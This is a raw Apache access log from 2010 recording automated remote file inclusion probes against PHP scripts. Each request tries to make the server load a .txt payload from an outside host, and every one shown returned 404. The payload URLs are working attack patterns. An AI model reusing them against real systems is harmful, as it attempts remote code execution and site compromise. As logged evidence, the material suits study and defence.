110.45.144.106 - - [23/Feb/2010:00:25:35 -0500] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
110.45.144.106 - - [23/Feb/2010:00:25:35 -0500] "GET /logs/access_log.Q110012000%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:00:26:04 -0500] "GET /logs/access_log.Q109052000///includes/orderSuccess.inc.php?glob=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:00:26:04 -0500] "GET ///includes/orderSuccess.inc.php?glob=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:00:26:04 -0500] "GET /logs///includes/orderSuccess.inc.php?glob=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:00:26:19 -0500] "GET ///bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:00:26:19 -0500] "GET /logs///bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:00:26:19 -0500] "GET /logs/error_log.Q110021100///bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:00:26:19 -0500] "GET /logs/access_log.Q110021100///bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:00:26:39 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:00:26:39 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
200.150.6.42 - - [23/Feb/2010:00:26:39 -0500] "GET /logs/error_log.Q110021100///bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:00:26:40 -0500] "GET /logs///bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
